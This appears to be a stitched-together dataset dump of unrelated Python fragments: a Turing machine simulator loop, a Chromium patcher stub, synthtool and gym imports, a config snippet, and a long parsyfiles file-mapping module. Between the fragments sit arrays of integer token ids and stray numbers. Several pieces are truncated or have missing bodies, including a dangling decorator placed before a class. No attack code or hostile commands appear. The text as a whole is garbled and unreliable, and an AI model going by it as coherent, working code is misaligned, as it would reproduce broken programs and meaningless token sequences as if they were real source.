    # Choose and initialise the program (which may have come from 'TMulator_programming.py')
    state_machine = PROGRAM_00 # <------------------------------------------------------ Choose here the program you wish to run
    current_card_index = START_CARD_INDEX # Should always be 1
    #
    # Choose and initialise the data (which may have come from 'TMulator_programming.py')
    current_tape = TAPE_00; current_tape_index = START_CELL_INDEX_00 # <------------------------------ Choose desired tape and start cell index
    #
    # Print out starting machine state
    print('\n\nSimple Turing Machine implementation')
    print('====================================\n')
    print('Initial starting state')
    print('\nState machine definition (i.e. the program):- \n', state_machine)
    print('\nCurrent tape (i.e. the input data):- ', current_tape)
    print('Current tape index (i.e. current R/W head position):- ', current_tape_index)
    print('Current card index (i.e. current state):- ', current_card_index)
    #
    # Now step the machine through the desired maximum number of steps, or fewer if it halts earlier than that
    for time_step in range(1,MAX_NUMBER_OF_STEPS+1):
        #
        # Execute the step. execute_a_TM_step returns the next machine configuration as a tuple:
        # (tape contents, R/W head position, next card/state index) -- see the unpacking below.
        (new_tape, new_tape_index, new_card_index) = execute_a_TM_step(current_tape, current_tape_index, state_machine[current_card_index])
        #
        # Update state parameters now that we have executed the step
        current_tape = new_tape
        current_tape_index = new_tape_index
        current_card_index = new_card_index
        #
        # Print machine state after this time step
        print('\nTime step (just taken):- ', time_step)
        print('Current tape:- ', current_tape)
        print('Current tape index:- ', current_tape_index)
        print('Current card index:- ', current_card_index)
        #
        # Halt the machine if we have hit state 0 (card index 0 is the halting state by convention,
        # see the comment on START_CARD_INDEX above)
        if current_card_index == 0:
            print('\nMachine halted (on card index 0)\n')
            break
| [
29113,
29113,
7804,
4242,
2235,
198,
2,
770,
11361,
2438,
468,
587,
3194,
284,
33836,
257,
2829,
39141,
10850,
13,
198,
2,
25300,
15297,
468,
587,
7428,
422,
10288,
884,
355,
262,
1708,
25,
198,
2,
198,
2,
3740,
1378,
2503,
13,
6359... | 3.092406 | 2,186 |
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from datetime import datetime, timedelta
from file_system import FileNotFoundError, ToUnicode
from future import Future
from patcher import Patcher
_VERSION_CACHE_MAXAGE = timedelta(seconds=5)
''' Append @version for keys to distinguish between different patchsets of
an issue.
'''
class CachingRietveldPatcher(Patcher):
''' CachingRietveldPatcher implements a caching layer on top of |patcher|.
In theory, it can be used with any class that implements Patcher. But this
class assumes that applying to all patched files at once is more efficient
than applying to individual files.
'''
| [
2,
15069,
2211,
383,
18255,
1505,
46665,
13,
1439,
2489,
10395,
13,
198,
2,
5765,
286,
428,
2723,
2438,
318,
21825,
416,
257,
347,
10305,
12,
7635,
5964,
326,
460,
307,
198,
2,
1043,
287,
262,
38559,
24290,
2393,
13,
198,
198,
6738,... | 3.676329 | 207 |
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import requests
import shutil
import subprocess
import yaml
from pathlib import Path
from typing import Optional
from synthtool import _tracked_paths, metadata, shell
from synthtool.gcp import artman
from synthtool.log import logger
from synthtool.sources import git
GOOGLEAPIS_URL: str = git.make_repo_clone_url("googleapis/googleapis")
GOOGLEAPIS_PRIVATE_URL: str = git.make_repo_clone_url("googleapis/googleapis-private")
LOCAL_GOOGLEAPIS: Optional[str] = os.environ.get("SYNTHTOOL_GOOGLEAPIS")
LOCAL_GENERATOR: Optional[str] = os.environ.get("SYNTHTOOL_GENERATOR")
| [
2,
15069,
2864,
3012,
11419,
198,
2,
198,
2,
49962,
739,
262,
24843,
13789,
11,
10628,
362,
13,
15,
357,
1169,
366,
34156,
15341,
198,
2,
345,
743,
407,
779,
428,
2393,
2845,
287,
11846,
351,
262,
13789,
13,
198,
2,
921,
743,
7330... | 3.246499 | 357 |
from configparser import ConfigParser
config_ini = ConfigParser()
config_ini.read('configs/config.ini')
sqlite_db = config_ini['DATABASE']['SQLITE_DB']
config = dict(
dev=DevelopmentConfig,
test=TestingConfig,
prod=ProductionConfig,
)
| [
6738,
4566,
48610,
1330,
17056,
46677,
198,
198,
11250,
62,
5362,
796,
17056,
46677,
3419,
198,
11250,
62,
5362,
13,
961,
10786,
11250,
82,
14,
11250,
13,
5362,
11537,
198,
25410,
578,
62,
9945,
796,
4566,
62,
5362,
17816,
35,
1404,
6... | 2.853933 | 89 |
from abc import abstractmethod, ABCMeta
from logging import Logger
from os import listdir, sep
from os.path import isfile, join, isdir, dirname, basename, exists, splitext
from typing import Dict, List, Any, Tuple, Union
from parsyfiles.global_config import GLOBAL_CONFIG
from parsyfiles.var_checker import check_var
EXT_SEPARATOR = '.'
MULTIFILE_EXT = '<multifile>'
class ObjectPresentMultipleTimesOnFileSystemError(Exception):
    """
    Raised whenever a given attribute is present several times in the filesystem (with multiple extensions)
    """

    def __init__(self, contents: str):
        """
        Constructor taking the full message as its single argument.

        A single-argument constructor is kept deliberately: multi-argument exception constructors
        trigger a bug in Nose tests (https://github.com/nose-devs/nose/issues/725), hence the
        static factory create() below.

        :param contents: the exception message
        """
        super().__init__(contents)

    @staticmethod
    def create(location: str, extensions_found: List[str] = None):
        """
        Static factory building the full error message from the offending location and, if known,
        the list of extensions under which the object was found. See __init__ for why this is not
        done in the constructor.

        :param location: the location found several times on the file system
        :param extensions_found: the extensions under which the object was found, if known
        :return: the ready-to-raise exception
        """
        if extensions_found:
            msg = ("Object : {loc} is present multiple times on the file system , with extensions : "
                   "{exts}. Only one version of each object should be provided. If you need multiple "
                   "files to create this object, you should create a multifile object instead (with "
                   "each file having its own name and a shared prefix)").format(loc=location,
                                                                                exts=extensions_found)
        else:
            msg = "Object : {loc} is present multiple times on the file system.".format(loc=location)
        return ObjectPresentMultipleTimesOnFileSystemError(msg)
class ObjectNotFoundOnFileSystemError(FileNotFoundError):
    """
    Raised whenever a given object is missing on the filesystem (no singlefile nor multifile found)
    """

    def __init__(self, contents: str):
        """
        We actually can't put more than 1 argument in the constructor, it creates a bug in Nose tests
        https://github.com/nose-devs/nose/issues/725
        That's why we have a helper static method create()

        :param contents: the exception message
        """
        super(ObjectNotFoundOnFileSystemError, self).__init__(contents)

    @staticmethod
    def create(location: str, simpleobjects_found=None, complexobject_attributes_found=None):
        """
        Helper method provided because we actually can't put that in the constructor, it creates a bug in Nose tests
        https://github.com/nose-devs/nose/issues/725

        Bug fix: the optional arguments are now normalized to empty dicts; previously calling
        create(location) with the declared defaults raised TypeError (len(None)).

        :param location: the location at which the object could not be found
        :param simpleobjects_found: optional dict of singlefile occurrences found at the location stripped of its
         extension (used to detect the 'extension left in the location name' mistake)
        :param complexobject_attributes_found: optional dict of multifile children found at the location stripped
         of its extension
        :return: the ready-to-raise exception
        """
        # Defensive defaults so that the len() calls below are always valid
        simpleobjects_found = simpleobjects_found if simpleobjects_found is not None else {}
        complexobject_attributes_found = (complexobject_attributes_found
                                          if complexobject_attributes_found is not None else {})
        if len(complexobject_attributes_found) > 0 or len(simpleobjects_found) > 0:
            # something WAS found at the extension-stripped location: the caller probably left the extension in
            return ObjectNotFoundOnFileSystemError('Mandatory object : ' + location + ' could not be found on the file'
                                                   ' system, either as a multifile or as a singlefile with any '
                                                   'extension, but it seems that this is because you have left the '
                                                   'extension in the location name. Please remove the file extension '
                                                   'from the location name and try again')
        else:
            return ObjectNotFoundOnFileSystemError('Mandatory object : ' + location + ' could not be found on the file'
                                                   ' system, either as a multifile or as a singlefile with any '
                                                   'extension.')
class IllegalContentNameError(Exception):
    """
    Raised whenever a attribute of a multifile object or collection has an empty name
    """

    def __init__(self, contents):
        """
        Constructor taking the full message as its single argument.

        A single-argument constructor is kept deliberately: multi-argument exception constructors
        trigger a bug in Nose tests (https://github.com/nose-devs/nose/issues/725), hence the
        static factory create() below.

        :param contents: the exception message
        """
        super().__init__(contents)

    @staticmethod
    def create(location: str, child_location: str):
        """
        Static factory building the full error message from the parent location and the path of the
        offending (empty-named) child. See __init__ for why this is not done in the constructor.

        :param location: the location of the multifile object
        :param child_location: the path of the child whose name is empty
        :return: the ready-to-raise exception
        """
        msg = ("The object '{parent}' is present on file system as a multifile object but contains "
               "a child object with an empty name at path '{child}'").format(parent=location,
                                                                             child=child_location)
        return IllegalContentNameError(msg)
class AbstractFileMappingConfiguration(metaclass=ABCMeta):
    """
    Represents a file mapping configuration. It should be able to find singlefile and multifile objects at specific
    locations. Note that this class does not know the concept of PersistedObject, it just manipulates locations.
    """

    def __init__(self, encoding: str = None):
        """
        Constructor, with the encoding registered to open the singlefiles.

        :param encoding: the encoding used to open the files. Default is 'utf-8'
        """
        check_var(encoding, var_types=str, var_name='encoding', enforce_not_none=False)
        self.encoding = encoding or 'utf-8'

    def get_unique_object_contents(self, location: str) -> Tuple[bool, str, Union[str, Dict[str, str]]]:
        """
        Utility method to find a unique singlefile or multifile object.
        This method throws

        * ObjectNotFoundOnFileSystemError if no file is found
        * ObjectPresentMultipleTimesOnFileSystemError if the object is found multiple times (for example with
          several file extensions, or as a file AND a folder)
        * IllegalContentNameError if a multifile child name is None or empty string.

        It relies on the abstract methods of this class (find_simpleobject_file_occurrences and
        find_multifile_object_children) to find the various files present.

        :param location: a location identifier compliant with the provided file mapping configuration
        :return: (True, singlefile_ext, singlefile_path) if a unique singlefile object is present ;
          (False, MULTIFILE_EXT, complexobject_attributes_found) if a unique multifile object is present, with
          complexobject_attributes_found being a dictionary {name: location}
        """
        # First check what is present on the filesystem according to the filemapping
        simpleobjects_found = self.find_simpleobject_file_occurrences(location)
        complexobject_attributes_found = self.find_multifile_object_children(location, no_errors=True)

        # Then handle the various cases
        if len(simpleobjects_found) > 1 \
                or (len(simpleobjects_found) == 1 and len(complexobject_attributes_found) > 0):
            # the object is present several times > error
            u = simpleobjects_found
            u.update(complexobject_attributes_found)
            raise ObjectPresentMultipleTimesOnFileSystemError.create(location, list(u.keys()))
        elif len(simpleobjects_found) == 1:
            # a singlefile object > create the output (the only key is the extension, its value the file path)
            is_single_file = True
            ext = list(simpleobjects_found.keys())[0]
            singlefile_object_file_path = simpleobjects_found[ext]
            return is_single_file, ext, singlefile_object_file_path
        elif len(complexobject_attributes_found) > 0:
            # a multifile object > create the output
            is_single_file = False
            ext = MULTIFILE_EXT
            # NOTE(review): the lookup below indexes with MULTIFILE_EXT although this branch is triggered by a
            # '' or None key -- it looks like it would raise KeyError instead of the intended error.
            # TODO confirm against the test suite before changing.
            if '' in complexobject_attributes_found.keys() or None in complexobject_attributes_found.keys():
                raise IllegalContentNameError.create(location, complexobject_attributes_found[MULTIFILE_EXT])
            return is_single_file, ext, complexobject_attributes_found
        else:
            # handle special case of multifile object with no children (if applicable)
            if self.is_multifile_object_without_children(location):
                is_single_file = False
                ext = MULTIFILE_EXT
                return is_single_file, ext, dict()
            else:
                # try if by any chance the issue is that location has an extension
                loc_without_ext = splitext(location)[0]
                simpleobjects_found = self.find_simpleobject_file_occurrences(loc_without_ext)
                complexobject_attributes_found = self.find_multifile_object_children(loc_without_ext, no_errors=True)
                # the object was not found in a form that can be parsed
                raise ObjectNotFoundOnFileSystemError.create(location, simpleobjects_found,
                                                             complexobject_attributes_found)

    def is_present_as_singlefile_object(self, location, sep_for_flat):
        """
        Utility method to check if an item is present as a simple object - that means, if there is any file matching
        this prefix with any extension

        NOTE(review): this passes `sep_for_flat` to find_simpleobject_file_occurrences, whose abstract signature
        below only declares `location`. Only implementations accepting a second positional argument (flat mode)
        can support this call -- TODO confirm.

        :param location: the location identifier to check
        :param sep_for_flat: the separator used in flat mode
        :return: True if at least one singlefile occurrence exists at this location
        """
        return len(self.find_simpleobject_file_occurrences(location, sep_for_flat)) > 0

    @abstractmethod
    def find_simpleobject_file_occurrences(self, location) -> Dict[str, str]:
        """
        Implementing classes should return a dict of <ext, file_path> that match the given simple object, with any
        extension. If the object is found several times all extensions should be returned

        :param location: the location identifier to check
        :return: a dictionary of {ext : file_path}
        """
        pass

    # def is_present_as_multifile_object(self, location: str) -> bool:
    #     """
    #     Returns True if an item with this location is present as a multifile object with children, or False otherwise
    #
    #     :param location:
    #     :return:
    #     """
    #     return len(self.find_multifile_object_children(location)) > 0

    @abstractmethod
    def is_multifile_object_without_children(self, location: str) -> bool:
        """
        Returns True if an item with this location is present as a multifile object without children

        :param location: the location identifier to check
        :return: True if a childless multifile object exists at this location
        """

    @abstractmethod
    def find_multifile_object_children(self, parent_location: str, no_errors: bool = False) -> Dict[str, str]:
        """
        Implementing classes should return a dictionary of <item_name>, <item_location> containing the named elements
        in this multifile object.

        :param parent_location: the absolute file prefix of the parent item.
        :param no_errors: if True, an invalid parent location should yield an empty result instead of raising
        :return: a dictionary of {item_name : item_prefix}
        """
        pass

    @abstractmethod
    def get_multifile_object_child_location(self, parent_location: str, child_name: str) -> str:
        """
        Implementing classes should return the expected location for the child named 'child_name' of the parent item
        located at 'parent_location'

        :param parent_location: the absolute file prefix of the parent item
        :param child_name: the name of the child
        :return: the location of the child
        """
        pass
class PersistedObject(metaclass=ABCMeta):
    """
    Contains all information about an object persisted at a given location. It may be a multifile (in which case it has
    extension MULTIFILE_EXT) or a single file (in which case it has an extension such as .txt, .cfg, etc.)
    """

    def __init__(self, location: str, is_singlefile: bool, ext: str):
        """
        Constructor. A persisted object has a given filesystem location, is a singlefile or not (in which case it has
        children), and has an extension such as .txt, .cfg, etc. Multifile objects have extension MULTIFILE_EXT.

        :param location: the filesystem location (file prefix) of the persisted object
        :param is_singlefile: True for a singlefile object, False for a multifile one
        :param ext: the file extension, or MULTIFILE_EXT for multifile objects
        """
        # -- location
        check_var(location, var_types=str, var_name='location')
        self.location = location

        # -- single file
        check_var(is_singlefile, var_types=bool, var_name='is_singlefile')
        self.is_singlefile = is_singlefile

        # -- ext
        check_var(ext, var_types=str, var_name='ext')
        self.ext = ext

        # -- sanity check: a singlefile object must NOT carry the multifile extension and a multifile object must.
        # Bug fix: use string equality (==/!=) instead of identity (is/is not), which only worked by accident
        # of interning when ext was the very MULTIFILE_EXT constant object.
        if (is_singlefile and self.ext == MULTIFILE_EXT) or (not is_singlefile and self.ext != MULTIFILE_EXT):
            raise ValueError('Inconsistent object definition : is_singlefile and self.ext should be consistent')

    def get_pretty_file_mode(self):
        """
        Utility method to return a string representing the mode of this file, 'singlefile' or 'multifile'

        :return: 'singlefile' or 'multifile'
        """
        return 'singlefile' if self.is_singlefile else 'multifile'

    def get_pretty_file_ext(self):
        """
        Utility method to return a string representing the mode and extension of this file,
        e.g 'singlefile, .txt' or 'multifile'

        :return: the pretty mode/extension string
        """
        return ('singlefile, ' + self.ext) if self.is_singlefile else 'multifile'

    def get_pretty_location(self, blank_parent_part: bool = False, append_file_ext: bool = True,
                            compact_file_ext: bool = False):
        """
        Utility method to return a string representing the location, mode and extension of this file.

        :param blank_parent_part: if True the parent part of the location is blanked and a '|--' marker is shown
        :param append_file_ext: if True a suffix describing the file mode/extension is appended
        :param compact_file_ext: if True the suffix is the bare extension instead of ' (<mode>, <ext>)'
        :return: the pretty location string
        """
        if append_file_ext:
            if compact_file_ext:
                # bare extension for singlefiles, nothing for multifiles
                suffix = self.ext if self.is_singlefile else ''
            else:
                suffix = ' (' + self.get_pretty_file_ext() + ')'
        else:
            suffix = ''
        if blank_parent_part:
            # TODO sep should be replaced with the appropriate separator in flat mode
            idx = self.location.rfind(sep)
            return (' ' * (idx-1-len(sep))) + '|--' + self.location[(idx+1):] + suffix
        else:
            return self.location + suffix

    def get_pretty_child_location(self, child_name, blank_parent_part: bool = False):
        """
        Utility method to return a string representation of the location of a child

        :param child_name: the name of the child
        :param blank_parent_part: if True the parent part of the location is blanked and a '|--' marker is shown
        :return: the pretty child location string
        """
        if blank_parent_part:
            idx = len(self.location)
            return (' ' * (idx-3)) + '|--' + child_name
        else:
            # TODO sep should be replaced with the appropriate separator in flat mode
            return self.location + sep + child_name

    @abstractmethod
    def get_singlefile_path(self):
        """
        Implementing classes should return the path of this file, in case of a singlefile. If multifile, they should
        raise an exception.

        :return: the file path
        """
        pass

    @abstractmethod
    def get_singlefile_encoding(self):
        """
        Implementing classes should return the file encoding, in case of a singlefile. If multifile, they should
        raise an exception.

        :return: the file encoding
        """
        pass

    @abstractmethod
    def get_multifile_children(self) -> Dict[str, Any]:  # actually, not Any but PersistedObject
        """
        Implementing classes should return a dictionary of PersistedObjects, for each named child of this object.

        :return: a dictionary {child_name: PersistedObject}
        """
        pass
class FolderAndFilesStructureError(Exception):
    """
    Raised whenever the folder and files structure does not match with the one expected
    """
    # NOTE(review): a dangling @staticmethod decorator follows this class in the file, suggesting a
    # factory method (like the other error classes' create()) was intended here -- TODO confirm.
@staticmethod
class FileMappingConfiguration(AbstractFileMappingConfiguration):
    """
    Abstract class for all file mapping configurations. In addition to be an AbstractFileMappingConfiguration (meaning
    that it can find objects at locations), it is able to create instances of PersistedObject, recursively.
    """

    class RecursivePersistedObject(PersistedObject):
        """
        Represents an object on the filesystem. It may be multifile or singlefile. When this object is created it
        recursively scans all of its children if any, and builds the corresponding PersistedObjects. All of this is
        logged on the provided logger if any.
        """

        def __init__(self, location: str, file_mapping_conf: AbstractFileMappingConfiguration = None,
                     logger: Logger = None, log_only_last: bool = False):
            """
            Creates a PersistedObject representing an object on the filesystem at location 'location'. It may be
            multifile or singlefile. When this object is created it recursively scans all of its children if any, and
            builds the corresponding PersistedObjects. All of this is logged on the provided logger if any.

            :param location: the filesystem location of the object
            :param file_mapping_conf: the file mapping configuration used to resolve the location
            :param logger: an optional logger for debug output
            :param log_only_last: if True only the last part of the location is shown in logs (used for children)
            """
            # -- file mapping
            check_var(file_mapping_conf, var_types=FileMappingConfiguration, var_name='file_mapping_conf')
            self.file_mapping_conf = file_mapping_conf

            # -- logger
            check_var(logger, var_types=Logger, var_name='logger', enforce_not_none=False)
            self.logger = logger

            try:
                # -- check single file or multifile thanks to the filemapping
                is_singlefile, ext, self._contents_or_path = self.file_mapping_conf.get_unique_object_contents(location)

                # -- store all information in the container(parent class)
                super(FileMappingConfiguration.RecursivePersistedObject, self).__init__(location, is_singlefile, ext)

                # -- log this for easy debug
                if logger is not None:
                    logger.debug('(C) ' + self.get_pretty_location(
                        blank_parent_part=(log_only_last and not GLOBAL_CONFIG.full_paths_in_logs)))

                # -- create and attach all the self.children if multifile (recursive scan, in sorted name
                # order so that logs are deterministic)
                if not self.is_singlefile:
                    self.children = {name: FileMappingConfiguration.RecursivePersistedObject(loc,
                                     file_mapping_conf=self.file_mapping_conf, logger=self.logger, log_only_last=True)
                                     for name, loc in sorted(self._contents_or_path.items())}

            except (ObjectNotFoundOnFileSystemError, ObjectPresentMultipleTimesOnFileSystemError,
                    IllegalContentNameError) as e:
                # -- log the object that was being built, just for consistency of log messages
                if logger is not None:
                    logger.debug(location)
                raise e.with_traceback(e.__traceback__)

        def get_singlefile_path(self):
            """
            Implementation of the parent method

            :return: the path of the single file backing this object
            """
            if self.is_singlefile:
                return self._contents_or_path
            else:
                raise NotImplementedError(
                    'get_file_path_no_ext does not make any sense on a multifile object. Use object.location'
                    ' to get the file prefix')

        def get_singlefile_encoding(self):
            """
            Implementation of the parent method

            :return: the encoding of the single file backing this object
            """
            if self.is_singlefile:
                return self.file_mapping_conf.encoding
            else:
                raise NotImplementedError('get_file_encoding does not make any sense on a multifile object. Check this '
                                          'object\'s children to know their encoding')

        def get_multifile_children(self) -> Dict[str, PersistedObject]:
            """
            Implementation of the parent method

            :return: the dictionary {child_name: PersistedObject} of this multifile object's children
            """
            if self.is_singlefile:
                raise NotImplementedError(
                    'get_multifile_children does not mean anything on a singlefile object : a single file'
                    'object by definition has no children - check your code')
            else:
                return self.children

    def __init__(self, encoding:str = None):
        """
        Constructor, with the encoding registered to open the files.

        :param encoding: the encoding used to open the files. Default is 'utf-8'
        """
        super(FileMappingConfiguration, self).__init__(encoding)

    def create_persisted_object(self, location: str, logger: Logger) -> PersistedObject:
        """
        Creates a PersistedObject representing the object at location 'location', and recursively creates all of its
        children

        :param location: the filesystem location of the root object
        :param logger: the logger used for debug output during the scan
        :return: the root PersistedObject
        """
        #print('Checking all files under ' + location)
        logger.debug('Checking all files under [{loc}]'.format(loc=location))
        obj = FileMappingConfiguration.RecursivePersistedObject(location=location, file_mapping_conf=self,
                                                                logger=logger)
        #print('File checks done')
        logger.debug('File checks done')
        return obj
class WrappedFileMappingConfiguration(FileMappingConfiguration):
    """
    A file mapping where multifile objects are represented by folders: each multifile object is a folder,
    whose children are the files (singlefile) or subfolders (multifile) inside it.
    """

    def __init__(self, encoding: str = None):
        """
        Constructor, with the encoding registered to open the files.

        :param encoding: the encoding used to open the files. Default is 'utf-8'
        """
        super(WrappedFileMappingConfiguration, self).__init__(encoding=encoding)

    def find_multifile_object_children(self, parent_location, no_errors: bool = False) -> Dict[str, str]:
        """
        Implementation of the parent abstract method.

        In this mode, root_path should be a valid folder, and each item is a subfolder (multifile) or a file
        (singlefile):

            location/
            |-singlefile_sub_item1.<ext>
            |-singlefile_sub_item2.<ext>
            |-multifile_sub_item3/
              |- ...

        :param parent_location: the absolute file prefix of the parent item. it may be a folder (non-flat mode)
         or a folder + a file name prefix (flat mode)
        :param no_errors: if True, an invalid folder yields an empty result instead of raising. Used in internal
         recursive calls; should not be changed by users.
        :return: a dictionary of {item_name : item_prefix}
        """
        # (1) Assert that folder_path is a folder
        if not isdir(parent_location):
            if no_errors:
                return dict()
            else:
                raise ValueError('Cannot find a multifileobject at location \'' + parent_location + '\' : location is '
                                 'not a valid folder')
        else:
            # (2) List folders (multifile objects or collections)
            all_subfolders = [dir_ for dir_ in listdir(parent_location) if isdir(join(parent_location, dir_))]
            items = {item_name: join(parent_location, item_name) for item_name in all_subfolders}

            # (3) List singlefiles *without* their extension
            items.update({
                item_name: join(parent_location, item_name)
                for item_name in [file_name[0:file_name.rindex(EXT_SEPARATOR)]
                                  for file_name in listdir(parent_location)
                                  if isfile(join(parent_location, file_name))
                                  and EXT_SEPARATOR in file_name]
            })
            # (4) return all
            return items

    def is_multifile_object_without_children(self, location: str) -> bool:
        """
        Returns True if an item with this location is present as a multifile object without children.
        For this implementation, this means that there is a folder without any files in it

        :param location: the location to check
        :return: True if location is an empty folder
        """
        return isdir(location) and len(self.find_multifile_object_children(location)) == 0

    def get_multifile_object_child_location(self, parent_item_prefix: str, child_name: str) -> str:
        """
        Implementation of the parent abstract method.
        In this mode the attribute is a file inside the parent object folder

        :param parent_item_prefix: the absolute file prefix of the parent item (must be an existing folder)
        :param child_name: the name of the child attribute
        :return: the file prefix for this attribute
        """
        check_var(parent_item_prefix, var_types=str, var_name='parent_item_prefix')
        check_var(child_name, var_types=str, var_name='item_name')

        # assert that folder_path is a folder
        if not isdir(parent_item_prefix):
            raise ValueError(
                'Cannot get attribute item in non-flat mode, parent item path is not a folder : ' + parent_item_prefix)
        return join(parent_item_prefix, child_name)

    def find_simpleobject_file_occurrences(self, location) -> Dict[str, str]:
        """
        Implementation of the parent abstract method. Finds all files named <location>.<ext> (exactly one
        extension separator after the prefix) in the parent directory of 'location'.

        :param location: the file prefix to search for
        :return: a dictionary of {ext : file_path}
        """
        parent_dir = dirname(location)
        # Bug fix: the original used `parent_dir is ''`, an identity comparison that only worked through
        # CPython string interning (and raises SyntaxWarning on modern interpreters); use equality instead.
        if parent_dir == '':
            parent_dir = '.'
        base_prefix = basename(location)
        # Consistency fix: use join() as everywhere else in this class instead of manual '/' concatenation,
        # which also makes the path handling correct on every platform.
        possible_object_files = {object_file[len(base_prefix):]: join(parent_dir, object_file)
                                 for object_file in listdir(parent_dir) if
                                 isfile(join(parent_dir, object_file))
                                 and object_file.startswith(base_prefix)
                                 # file must be named base_prefix.something
                                 and object_file != base_prefix
                                 and object_file[len(base_prefix)] == EXT_SEPARATOR
                                 and (object_file[len(base_prefix):]).count(EXT_SEPARATOR) == 1}
        return possible_object_files
class FlatFileMappingConfiguration(FileMappingConfiguration):
    """
    A file mapping where multifile objects are group of files located in the same folder than their parent,
    with their parent name as the prefix, followed by a configurable separator.
    """
    def __init__(self, separator: str = None, encoding: str = None):
        """
        Constructor.

        :param separator: the character sequence used to separate an item name from an item attribute name. Only
            used in flat mode. Default is '.'
        :param encoding: encoding used to open the files. Default is 'utf-8'
        :raises ValueError: if the separator contains a folder separation character
        """
        super(FlatFileMappingConfiguration, self).__init__(encoding=encoding)

        # -- check separator
        check_var(separator, var_types=str, var_name='sep_for_flat', enforce_not_none=False, min_len=1)
        self.separator = separator or '.'
        if '/' in self.separator or '\\' in self.separator:
            raise ValueError('Separator cannot contain a folder separation character')

    def find_multifile_object_children(self, parent_location, no_errors: bool = False) -> Dict[str, str]:
        """
        Implementation of the parent abstract method.

        In this mode, each item is a set of files with the same prefix than location, separated from the
        attribute name by the character sequence <self.separator>. The location may also be directly a folder,
        in which case the sub items dont have a prefix.

        example if location = '<parent_folder>/<file_prefix>'

            parent_folder/
            |-file_prefix<sep>singlefile_sub_item1.<ext>
            |-file_prefix<sep>singlefile_sub_item2.<ext>
            |-file_prefix<sep>multifile_sub_item3<sep>singlesub1.<ext>
            |-file_prefix<sep>multifile_sub_item3<sep>singlesub2.<ext>

        example if location = '<parent_folder>/'

            parent_folder/
            |-singlefile_sub_item1.<ext>
            |-singlefile_sub_item2.<ext>
            |-multifile_sub_item3<sep>singlesub1.<ext>
            |-multifile_sub_item3<sep>singlesub2.<ext>

        :param parent_location: the absolute file prefix of the parent item. It may be a folder (special case of
            the root folder) but typically is just a file prefix
        :param no_errors: unused in this implementation; kept for signature compatibility
        :return: a dictionary of <item_name>, <item_path>
        """
        if parent_location == '':
            parent_location = '.'

        # (1) Find the base directory and base name
        if isdir(parent_location):  # special case: parent location is the root folder where all the files are.
            parent_dir = parent_location
            base_prefix = ''
            start_with = ''
        else:
            parent_dir = dirname(parent_location)
            if parent_dir == '':  # FIX: was `parent_dir is ''` — identity comparison with a str literal
                parent_dir = '.'
            # TODO one day we'll rather want to have a uniform definition of 'location' across filemappings
            # Indeed as of today, location is not abstract from the file mapping implementation, since we
            # "just" use basename() rather than replacing os separators with our separator:
            base_prefix = basename(parent_location)  # --> so it should already include self.separator to be valid
            start_with = self.separator

        # (2) list children files that are singlefiles
        content_files = [content_file for content_file in listdir(parent_dir)
                         # -> we are in flat mode : should be a file not a folder :
                         if isfile(join(parent_dir, content_file))
                         # -> we are looking for children of a specific item :
                         and content_file.startswith(base_prefix)
                         # -> we are looking for multifile child items only :
                         and content_file != base_prefix
                         # -> they should start with the separator (or with nothing in case of the root folder) :
                         and (content_file[len(base_prefix):]).startswith(start_with)
                         # -> they should have a valid extension :
                         and (content_file[len(base_prefix + start_with):]).count(EXT_SEPARATOR) >= 1
                         ]

        # (3) build the resulting dictionary of item_name > item_prefix
        item_prefixes = dict()
        for item_file in content_files:
            # the child name ends at the next separator, or at the extension separator if none
            end_name = item_file.find(self.separator, len(base_prefix + start_with))
            if end_name == -1:
                end_name = item_file.find(EXT_SEPARATOR, len(base_prefix + start_with))
            item_name = item_file[len(base_prefix + start_with):end_name]
            item_prefixes[item_name] = join(parent_dir, base_prefix + start_with + item_name)
        return item_prefixes

    def is_multifile_object_without_children(self, location: str) -> bool:
        """
        Returns True if an item with this location is present as a multifile object without children.
        For this implementation, this means that there is a file with the appropriate name but without extension.

        :param location: the location to check
        :return: True for an empty root folder, or a bare (extension-less) file
        """
        # (1) Find the base directory and base name
        if isdir(location):  # special case: parent location is the root folder where all the files are.
            return len(self.find_multifile_object_children(location)) == 0
        else:
            # TODO same comment than in find_multifile_object_children
            # location is a file without extension. We can accept that as being a multifile object
            # without children
            return exists(location)

    def get_multifile_object_child_location(self, parent_location: str, child_name: str):
        """
        Implementation of the parent abstract method.
        In this mode the attribute is a file with the same prefix, separated from the parent object name by
        the character sequence <self.separator>.

        :param parent_location: the absolute file prefix of the parent item.
        :param child_name: the name of the child attribute
        :return: the file prefix for this attribute
        """
        check_var(parent_location, var_types=str, var_name='parent_path')
        check_var(child_name, var_types=str, var_name='item_name')

        # a child location is built by adding the separator between the child name and the parent location
        return parent_location + self.separator + child_name

    def find_simpleobject_file_occurrences(self, location) -> Dict[str, str]:
        """
        Implementation of the parent abstract method.

        :param location: the absolute file prefix of the simple object
        :return: a dictionary of {ext : file_path}
        """
        parent_dir = dirname(location)
        if parent_dir == '':  # FIX: was `parent_dir is ''` — identity comparison with a str literal
            parent_dir = '.'
        base_prefix = basename(location)

        # trick : if sep_for_flat is a dot, we have to take into account that there is also a dot for the extension
        min_sep_count = (1 if self.separator == EXT_SEPARATOR else 0)
        possible_object_files = {object_file[len(base_prefix):]: join(parent_dir, object_file)
                                 # FIX: use join() rather than manual '/' concatenation (portable)
                                 for object_file in listdir(parent_dir) if isfile(join(parent_dir, object_file))
                                 and object_file.startswith(base_prefix)
                                 # file must be named base_prefix.something
                                 and object_file != base_prefix
                                 and object_file[len(base_prefix)] == EXT_SEPARATOR
                                 and (object_file[len(base_prefix):]).count(EXT_SEPARATOR) == 1
                                 # and no other item separator should be present in the something
                                 and (object_file[len(base_prefix):]).count(self.separator) == min_sep_count}
        return possible_object_files
| [
6738,
450,
66,
1330,
12531,
24396,
11,
9738,
48526,
198,
6738,
18931,
1330,
5972,
1362,
198,
6738,
28686,
1330,
1351,
15908,
11,
41767,
198,
6738,
28686,
13,
6978,
1330,
318,
7753,
11,
4654,
11,
318,
15908,
11,
26672,
3672,
11,
1615,
... | 2.387545 | 14,308 |
#!/usr/bin/python
import gym
from gym import wrappers
import argparse
import numpy as np
